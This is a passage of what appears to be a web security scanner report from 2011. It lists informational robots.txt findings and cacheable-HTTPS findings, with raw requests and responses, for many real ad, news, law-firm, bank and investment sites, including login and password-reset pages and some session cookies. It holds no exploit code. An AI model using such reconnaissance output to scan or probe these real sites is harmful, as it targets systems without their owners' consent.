Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Thu, 12 May 2011 11:01:15 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

25.2. http://ad.us.doubleclick.net/adj/ftcom.5887.ftfm/private-equity previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.us.doubleclick.net
Path:	/adj/ftcom.5887.ftfm/private-equity

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.us.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Thu, 12 May 2011 11:03:16 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

25.3. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Fri, 13 May 2011 11:04:16 GMT
Date: Thu, 12 May 2011 11:04:16 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

25.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 20:19:44 GMT
Accept-Ranges: bytes
ETag: "0b02b30da1ac61:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 12 May 2011 11:03:16 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

25.5. http://by.optimost.com/counter/553/-/129/event.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://by.optimost.com
Path:	/counter/553/-/129/event.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: by.optimost.com

Response

HTTP/1.0 200 OK
Server: Fast
Content-Type: text/plain
Content-Length: 26
Accept-Ranges: bytes
Last-Modified: Thu, 30 Sep 2010 23:09:18 GMT
Expires: Thu, 12 May 2011 11:03:16 GMT
Pragma: no-cache
Date: Thu, 12 May 2011 11:03:16 GMT
Connection: close

User-agent: *
Disallow: /

25.6. http://convctr.overture.com/images/cc/cc.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://convctr.overture.com
Path:	/images/cc/cc.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: convctr.overture.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:25 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7a mod_perl/1.29
Last-Modified: Wed, 09 Jul 2008 01:24:35 GMT
ETag: "afc93b-1a-48741353"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

25.7. http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dealbook.nytimes.com
Path:	/2011/05/09/private-equity-has-a-horse-in-this-race/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dealbook.nytimes.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Content-Length: 122
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:
sitemap: http://spiderbites.nytimes.com/sitemaps/dealbook.nytimes.com/dealbook_full_sitemap.xml.gz

25.8. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_0/StdBanner.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.serving-sys.com
Path:	/BurstingCachedScripts//SBTemplates_2_3_0/StdBanner.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 13:19:41 GMT
Server: Microsoft-IIS/6.0
Date: Thu, 12 May 2011 11:03:34 GMT
Content-Length: 28
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /

25.9. http://engine.cmmeglobal.com/v1/page-view previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://engine.cmmeglobal.com
Path:	/v1/page-view

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: engine.cmmeglobal.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"81-1286792296000"
Last-Modified: Mon, 11 Oct 2010 10:18:16 GMT
Content-Type: text/plain
Content-Length: 81
Date: Thu, 12 May 2011 11:03:18 GMT
Connection: keep-alive

# Disallow robots to index any part of our contents
User-agent: *
Disallow: /

25.10. http://feeds.feedburner.com/CrmRadar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://feeds.feedburner.com
Path:	/CrmRadar

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.feedburner.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Thu, 12 May 2011 10:57:47 GMT
Expires: Thu, 12 May 2011 10:57:47 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /~a/

25.11. http://generalatlantic.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://generalatlantic.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: generalatlantic.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/plain
Last-Modified: Thu, 30 Apr 2009 19:53:14 GMT
Accept-Ranges: bytes
ETag: "0f1284ccdc9c91:22f2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:00:44 GMT
Connection: close

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disall
...[SNIP]...

25.12. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Thu, 12 May 2011 11:02:32 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

25.13. http://graphics8.nytimes.com/css/blogs/3.1/screen/themes/dealbook/style.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://graphics8.nytimes.com
Path:	/css/blogs/3.1/screen/themes/dealbook/style.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: graphics8.nytimes.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 512
Content-Type: text/html
Last-Modified: Wed, 29 Oct 2008 14:49:40 GMT
ETag: "200-49087804"
Cache-Control: private, max-age=478793
Date: Thu, 12 May 2011 11:02:58 GMT
Content-Length: 512
Connection: close

# robots.txt, www.nytimes.com 6/29/2006
#
User-agent: *
Disallow: /pages/college/
Disallow: /college/
Disallow: /library/
Disallow: /learning/
Disallow: /aponline/
Disallow: /reuters/
Disallow: /cnet/
...[SNIP]...

25.14. http://investmentfirmsdirect.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investmentfirmsdirect.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: investmentfirmsdirect.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:05:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO PSA OUR"
Content-Length: 67
Connection: close
Content-Type: text/html; charset=UTF-8

User-agent: *
Crawl-delay:20
Disallow: /click.php
Disallow: /ud.php

25.15. http://l.addthiscdn.com/live/t00/250lo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://l.addthiscdn.com
Path:	/live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 12 Apr 2011 11:05:10 GMT
ETag: "d71005-1b-4a0b6aa63c580"
Content-Type: text/plain; charset=UTF-8
Date: Thu, 12 May 2011 11:02:29 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

25.16. http://media.ft.com/h/subs.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.ft.com
Path:	/h/subs.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: media.ft.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:03:18 GMT
Content-Length: 677
Content-Type: text/plain; charset=utf-8
ETag: "2a5-4c179977"
Last-Modified: Tue, 15 Jun 2010 15:17:11 GMT
Accept-Ranges: bytes
Server: Apache/1.3.37
p3p: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Connection: close

User-agent: Googlebot-Mobile
Disallow: /search/
Disallow: /ftArticle
Disallow: /FTePaper
Disallow: /epaper
Disallow: /cms/s/8bb7fbd4-e176-11dd-afa0-0000779fd2ac.html
Disallow: /Common/

User-agent: Go
...[SNIP]...

25.17. http://pagead2.googlesyndication.com/pagead/imgad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pagead2.googlesyndication.com
Path:	/pagead/imgad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Thu, 12 May 2011 11:01:28 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

25.18. http://privatemoneytalk.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://privatemoneytalk.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: privatemoneytalk.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:48 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://privatemoneytalk.com/xmlrpc.php
Set-Cookie: PHPSESSID=64459fc69468cd2019f66bace4c7174a; path=/
Set-Cookie: sbmg_footerShowAfter=1; expires=Fri, 11-May-2012 11:02:49 GMT; path=/
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://privatemoneytalk.com/sitemap.xml.gz

25.19. http://pubads.g.doubleclick.net/gampad/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pubads.g.doubleclick.net
Path:	/gampad/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Thu, 12 May 2011 11:01:26 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

25.20. http://www.beneschlaw.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beneschlaw.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.beneschlaw.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Length: 637
Content-Type: text/plain
Last-Modified: Fri, 22 May 2009 19:57:02 GMT
Accept-Ranges: bytes
ETag: "fe9c567917dbc91:2a68"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000183
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A73
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:19:06 GMT
Connection: close
Set-Cookie: NSC_QPE-FHB7374_TibsfQspe=ffffffff09df180d45525d5f4f58455e445a4a423660;path=/

# STANDARD
User-agent: *
Disallow: /fc/
Disallow: /FirmConnect.aspx
Disallow: /Login.aspx
Disallow: /Logout.aspx
Disallow: /32/
Disallow: /1/
Disallow: /2/
Disallow: /3/
Disallow: /64/
Disa
...[SNIP]...

25.21. http://www.dmoc.com/sites/default/files/home-tetons.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmoc.com
Path:	/sites/default/files/home-tetons.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dmoc.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:20:54 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 10 Dec 2008 20:12:19 GMT
ETag: "11878bdc-636-45db6e083aec0"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Thu, 26 May 2011 12:20:54 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

25.22. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.54.201.41
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

25.23. http://www.ft.com/indepth/privateequity previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ft.com
Path:	/indepth/privateequity

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ft.com

Response

HTTP/1.1 200 OK
ETag: "215-4d9aca31"
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Accept-Ranges: bytes
Content-Length: 533
Date: Thu, 12 May 2011 11:03:00 GMT
Connection: close
Last-Modified: Tue, 05 Apr 2011 07:52:17 GMT
Server: Apache/1.3.37
Content-Type: text/plain; charset=utf-8
Keep-Alive: timeout=1, max=119

User-agent: Googlebot-Mobile
Disallow: /

User-agent: Googlebot-News
Disallow: /FTePaper
Disallow: /epaper
Disallow: /cms/s/8bb7fbd4-e176-11dd-afa0-0000779fd2ac.html
Disallow: /Common/

User-agent: Go
...[SNIP]...

25.24. http://www.google-analytics.com/__utm.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google-analytics.com
Path:	/__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Thu, 12 May 2011 11:00:56 GMT
Expires: Thu, 12 May 2011 11:00:56 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

25.25. http://www.huroncapital.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huroncapital.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.huroncapital.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:21 GMT
Server: Apache/1.3.37 (Unix)
AuthUser: -
Last-Modified: Tue, 22 Aug 2006 20:36:06 GMT
ETag: "3ffd2b-776-44eb6ab6"
Accept-Ranges: bytes
Content-Length: 1910
Content-Type: text/plain
Connection: close

#
# Any and all access by automated methods such as robots or spiders is
# restricted.
#
# Free license for such access is hereby granted to search engines which
# are freely open to the g
...[SNIP]...

25.26. http://www.managedfuturespecialist.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.managedfuturespecialist.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.managedfuturespecialist.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:05:33 GMT
Content-Type: text/plain
Connection: close
Server: Apache/Nginx/Varnish
Last-Modified: Fri, 01 Apr 2011 14:34:37 GMT
ETag: "b4db1e1c-18-49fdc4f32df80"
Cache-Control: max-age=14400, public
Expires: Thu, 12 May 2011 12:59:25 GMT
Content-Length: 24
Accept-Ranges: bytes
Age: 7567

User-agent: *
Disallow:

25.27. http://www.milbank.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.milbank.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.milbank.com

Response

HTTP/1.1 200 OK
Content-Length: 157
Content-Type: text/plain
Last-Modified: Tue, 05 Aug 2008 14:07:46 GMT
Accept-Ranges: bytes
ETag: "f73eaa24f7c81:23a"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:21:32 GMT
Connection: close

# Exclusions for milbank.com

# User-agent: *
# Disallow: /en/NewsEvents/RecentPressRel/Milbank_Advises_Genomma_Lab_Internacional_on_234_Million_IPO.htm

25.28. http://www.nytimes.com/adx/bin/adx_remote.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nytimes.com
Path:	/adx/bin/adx_remote.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nytimes.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:03:03 GMT
Content-length: 637
Content-type: text/plain
Set-cookie: RMID=2dff06a3406f4dcbbe6702e3; expires=Friday, 11-May-2012 11:03:03 GMT; path=/; domain=.nytimes.com
Last-modified: Mon, 26 Apr 2010 17:28:40 GMT
Accept-ranges: bytes
Connection: keep-alive

User-agent: *
Allow: /ads/public/
Disallow: /ads/
Disallow: /adx/bin/
Disallow: /aponline/
Disallow: /archives/
Disallow: /auth/
Disallow: /cnet/
Disallow: /college/
Disallow: /external/
Disallow: /fi
...[SNIP]...

25.29. http://www.opalgroup.net/google/ais2010.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opalgroup.net
Path:	/google/ais2010.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.opalgroup.net

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:01:15 GMT
Server: Apache/2.2.6 (Unix)
Last-Modified: Mon, 03 May 2010 17:14:41 GMT
ETag: "3a4108-407-ba796240"
Accept-Ranges: bytes
Content-Length: 1031
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Sitemap: http://www.opalgroup.net/sitemap.xml
Disallow: /playsite/
Disallow: /logaholic/
Disallow: /linkedin/
Disallow: /google/
Disallow: /mobile/
Disallow: /bing/
Disallow: /opalnew/
D
...[SNIP]...

25.30. http://www.pillsburylaw.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pillsburylaw.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pillsburylaw.com

Response

HTTP/1.1 200 OK
Content-Length: 186
Content-Type: text/plain
Content-Location: http://www.pillsburylaw.com/robots.txt
Last-Modified: Tue, 23 Mar 2010 16:27:52 GMT
Accept-Ranges: bytes
ETag: "81113c9a5caca1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:22:03 GMT
Connection: close

User-agent: *
Disallow: /admin/
Disallow: /mobile/
Disallow: /pdf.cfm
Disallow: /topdf.cfm
Disallow: /vcard.cfm
Disallow: /printfriendly.cfm
sitemap: web_sitemap_c3564d4c.xml.gz

25.31. http://www.porterwright.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.porterwright.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.porterwright.com

Response

HTTP/1.1 200 OK
Content-Length: 107
Content-Type: text/plain
Last-Modified: Fri, 02 Jan 2009 18:48:56 GMT
Accept-Ranges: bytes
ETag: "05cdec3a6dc91:8a30"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000896
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A68
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:21:51 GMT
Connection: close
Set-Cookie: NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65e45525d5f4f58455e445a4a423660;path=/

User-agent: *
Disallow: /fc/
Disallow: /FirmConnect.aspx
Disallow: /Login.aspx
Disallow: /Logout.aspx

25.32. http://www.privateequityinfo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.privateequityinfo.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.privateequityinfo.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:22 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 30 Nov 2010 21:37:36 GMT
ETag: "438038-111-4964bff40e800"
Accept-Ranges: bytes
Content-Length: 273
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /backup/
Disallow: /cgi-bin/
Disallow: /cp/
Disallow: /css/
Disallow: /e-spider/
Disallow: /editor/
Disallow: /grfx/
Disallow: /images/
Disallow: /js/
Disallow: /lib/
Disallow:
...[SNIP]...

25.33. http://www.privatemoneytalk.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.privatemoneytalk.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.privatemoneytalk.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:40 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://privatemoneytalk.com/xmlrpc.php
Set-Cookie: PHPSESSID=90e0f25853695845f09d2ae774dea406; path=/
Set-Cookie: sbmg_footerShowAfter=1; expires=Fri, 11-May-2012 11:02:45 GMT; path=/
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://privatemoneytalk.com/sitemap.xml.gz

25.34. http://www.stroock.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stroock.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stroock.com

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: text/plain
Content-Location: http://www.stroock.com/robots.txt
Last-Modified: Fri, 16 Jul 2010 21:06:05 GMT
Accept-Ranges: bytes
ETag: "22798eb42a25cb1:295"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:21:44 GMT
Connection: close

User-agent: *
Allow: /
Disallow: /bios/

25.35. http://www.vcgate.com/Private-Equity.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcgate.com
Path:	/Private-Equity.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vcgate.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 11:03:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-Pingback: http://www.vcgate.com/xmlrpc.php
Content-Type: text/plain; charset=utf-8
Content-Length: 24

User-agent: *
Disallow:

25.36. http://www.vcprodatabase.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcprodatabase.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vcprodatabase.com

Response

HTTP/1.1 200 OK
Content-Length: 353
Content-Type: text/plain
Last-Modified: Wed, 30 May 2007 01:35:35 GMT
Accept-Ranges: bytes
ETag: "e54eb5d15aa2c71:5897"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:02:26 GMT
Connection: close

User-agent: *
Disallow: /2006macmyrupdate/
Disallow: /2006myrupdate/
Disallow: /2007annupdate/
Disallow: /2007macannupdate/
Disallow: /affiliates/
Disallow: /eusers/
Disallow: /files/
Disallo
...[SNIP]...

26. Cacheable HTTPS response previous next
There are 23 instances of this issue:

https://ams-legal.net/support/blank.htm
https://ams-legal.net/tuckerellis/
https://ams-legal.net/tuckerellis/Image.asp
https://ams-legal.net/tuckerellis/blank.htm
https://cle-files.tuckerellis.com/
https://cle-files.tuckerellis.com/password_reset
https://cle-files.tuckerellis.com/register
https://investor.kkr.com/Recovery.aspx
https://investor.kkr.com/investor/login.html
https://personal.vanguard.com/us/funds/snapshot
https://services.sungarddx.com/admin/GetExternMedia.aspx
https://services.sungarddx.com/common/js/AdminFunctions.asp
https://virtualoffice.tuckerellis.com/
https://webmail-us.mimecast.com/
https://ww3.janus.com/advisor/templates/blank.jsp
https://www.opalgroup.net/forms/info_request/info_request.php
https://www.opalgroup.net/forms/register/register.php
https://www.opalgroup.net/forms/suggestions/suggestions.php
https://www.usaa.com/favicon.ico
https://www.wellsfargo.com/jump/theprivatebank/index
https://www.wellsfargo.com/pi_action/thePrivateBankFormAction
https://www.wellsfargo.com/theprivatebank/
https://www.wellsfargo.com/theprivatebank/contact_us

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

26.1. https://ams-legal.net/support/blank.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ams-legal.net
Path:	/support/blank.htm

Request

GET /support/blank.htm HTTP/1.1
Host: ams-legal.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://ams-legal.net/support/default.asp
Cookie: ASPSESSIONIDACBSASQD=JACKKCLBCMGCKCLIKDFBNIEK; ASPSESSIONIDSQCDBTRB=FEGHIDNBDBEOJFOALCNPEOKK

Response

HTTP/1.1 200 OK
Content-Length: 195
Content-Type: text/html
Last-Modified: Wed, 02 Feb 2011 22:12:40 GMT
Accept-Ranges: bytes
ETag: "07c4c4e26c3cb1:2d4e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:32:27 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html>
<head>
<title>Blank Page</title>
</head>
<body>

</body>
</html>

26.2. https://ams-legal.net/tuckerellis/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ams-legal.net
Path:	/tuckerellis/

Request

GET /tuckerellis/ HTTP/1.1
Host: ams-legal.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
